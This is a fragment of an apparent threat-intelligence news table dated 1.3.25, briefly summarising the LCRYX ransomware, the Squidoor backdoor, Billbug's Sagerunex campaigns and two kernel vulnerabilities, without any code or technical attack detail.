LCRYX is a VBScript-based ransomware discovered in the wild last year. The malware encrypts user data, appends ‘.lcryx’ to the locked files and demands ransom payment in the Bitcoin cryptocurrency. |
|||
1.3.25 |
New Squidoor backdoor variant distributed in latest campaigns |
Squidoor is a modular multi-platform backdoor variant supporting both Windows and Linux platforms. According to the researchers from Palo Alto, the newest strain of this malware is distributed in attacks associated with suspected Chinese threat actors. |
||
1.3.25 |
In Japan, the Bank of Yokohama is the largest regional bank headquartered in Yokohama. |
|||
1.3.25 |
Billbug (aka Lotus Blossom) threat group uses Sagerunex malware to target numerous victims |
The Billbug (aka Lotus Blossom) threat group has been observed leveraging Sagerunex malware, along with other hacking tools, to target numerous victims across industries. |
||
1.3.25 |
VULNEREBILITY |
(CVSS score: N/A) - An out-of-bounds access vulnerability for Extigy and Mbox devices |
||
1.3.25 |
VULNEREBILITY |
(CVSS score: 5.5) - A use of an uninitialized resource vulnerability that could be used to leak kernel memory |
||